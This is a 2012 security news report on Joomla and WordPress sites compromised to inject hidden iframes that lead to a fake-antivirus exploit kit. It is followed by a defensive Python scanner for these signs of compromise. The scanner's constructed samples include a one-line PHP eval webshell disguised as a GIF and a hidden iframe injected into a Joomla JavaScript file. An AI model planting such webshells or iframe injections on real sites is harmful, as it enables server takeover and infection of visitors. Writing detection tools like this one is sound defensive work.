Multiple Joomla Sites Serving Malware

Wednesday, December 12, 2012

According to the Internet Storm Center (ISC), compromised Joomla and WordPress sites are being used to host malicious iframes. The ISC notes that the servers hosting these sites are not being targeted through any single vulnerability; instead, some kind of tool is firing a bunch of exploits at each server in the hope that one of them hits.

“…it doesn’t seem to be a scanner exploiting one vulnerability but some tool that’s basically firing a bunch of Joomla and WordPress exploits at a given server and hoping something hits,” states the ISC.

Once compromised, these servers in turn infect visitors’ systems with fake antivirus software via an exploit kit. URLs ending in /nighttrend.cgi?8, as noted by the ISC, have been observed serving this malware, and a couple of IP addresses have also been identified as culprits so far.

Use of a traffic distribution system (TDS) has also been noticed: the injected iframes redirect visitors to the IPs hosting the exploit kit via the Sutra Traffic Distribution System. Symantec wrote about such attacks back in 2011, noting that although the TDS was an old concept, such systems were increasingly being used not only to buy and sell web traffic but also to deliver exploits.

Thomas Hungenberg of CERT-Bund, based on his analysis, believes that some kind of automated script may have been used to exploit vulnerabilities in the Joomla Content Editor (JCE). The description on the forum notes that once a vulnerable server is exploited, PHP code is uploaded to it disguised as a GIF file. The attacker can then invoke this file remotely and use it to inject malicious iframes into the site’s JavaScript files on a regular basis, The H notes.
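As an added illustration (not code from the ISC, CERT-Bund or The H reports), the following Python script checks a web root for the two artifacts the reports describe: PHP code hiding in files with an image extension, and iframes injected into JavaScript or HTML files, with the /nighttrend.cgi?8 URL pattern called out separately. The sample web root it builds is constructed for this example; the file paths, the regular expressions and the TEST-NET address 203.0.113.5 are assumptions, not indicators taken from the original reports.

```python
"""Triage scanner for the Joomla/WordPress compromise pattern described above.

Added example, not code from the ISC, CERT-Bund or The H. Two indicators:
  1. a file with an image extension whose bytes contain a PHP open tag
     (the "PHP masquerading as a GIF" upload);
  2. an <iframe> inside a JavaScript/HTML file, reported as "hidden_iframe"
     when its size or style hides it, plus the /nighttrend.cgi?8 URL pattern.
All sample files below are constructed; the signatures are assumptions.
"""
import os
import re
import shutil
import tempfile

PHP_TAG_RE = re.compile(rb"<\?(?:php\b|=)")
IFRAME_RE = re.compile(rb"<iframe\b[^>]*>", re.IGNORECASE)
# Zero/one-pixel dimensions or hidden styling are the usual injection tell-tales.
HIDDEN_RE = re.compile(
    rb"(?:width|height)\s*=\s*['\"]?\s*[01]\b"
    rb"|visibility\s*:\s*hidden"
    rb"|display\s*:\s*none",
    re.IGNORECASE,
)
NIGHTTREND_RE = re.compile(rb"/nighttrend\.cgi\?8")

IMAGE_EXTS = {".gif", ".jpg", ".jpeg", ".png"}
SCRIPT_EXTS = {".js", ".html", ".htm", ".php"}


def scan_file(path, root):
    """Return a list of (posix_relative_path, indicator) tuples for one file."""
    rel = os.path.relpath(path, root).replace(os.sep, "/")
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        data = fh.read()
    hits = []
    if ext in IMAGE_EXTS and PHP_TAG_RE.search(data):
        hits.append((rel, "php_in_image"))
    if ext in SCRIPT_EXTS:
        for match in IFRAME_RE.finditer(data):
            tag = match.group(0)
            hits.append((rel, "hidden_iframe" if HIDDEN_RE.search(tag) else "iframe"))
        if NIGHTTREND_RE.search(data):
            hits.append((rel, "nighttrend_url"))
    return hits


def scan_tree(root):
    """Walk a web root and return all findings, sorted for stable output."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            findings.extend(scan_file(os.path.join(dirpath, name), root))
    return sorted(findings)


def build_sample_webroot():
    """Create a throwaway directory of constructed sample files (not real captures)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    files = {
        # Legitimate tiny GIF: must not be flagged.
        "images/logo.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff",
        # Constructed webshell: GIF magic prepended to PHP so naive image checks pass.
        "images/stories/tmp.gif": b"GIF89a<?php @eval(base64_decode($_POST['x'])); ?>",
        # Constructed: site JS with an appended hidden iframe pointing at an
        # exploit-kit URL of the /nighttrend.cgi?8 form (203.0.113.5 is TEST-NET).
        "media/system/js/core.js": (
            b"var Joomla = Joomla || {};\n"
            b"document.write('<iframe src=\"http://203.0.113.5/nighttrend.cgi?8\" "
            b"width=\"1\" height=\"1\" style=\"visibility:hidden\"></iframe>');\n"
        ),
        # Visible, legitimate embed: reported as a plain iframe, not a hidden one.
        "index.html": (
            b"<html><body><iframe src=\"/map.html\" width=\"600\" height=\"400\">"
            b"</iframe></body></html>"
        ),
        # Clean PHP: a PHP tag in a .php file is normal and not reported.
        "index.php": b"<?php echo 'hello'; ?>",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    sample_root = build_sample_webroot()
    try:
        for rel_path, indicator in scan_tree(sample_root):
            print(f"{indicator:15s} {rel_path}")
    finally:
        shutil.rmtree(sample_root)
```

On a live host run `scan_tree("/var/www/html")` (or the Joomla root of the site). A PHP open tag inside an image file is a strong indicator on its own; a hidden iframe in a core library file such as one under media/system/js is reason to compare that file against a clean copy of the same Joomla release and to review the JCE version in use.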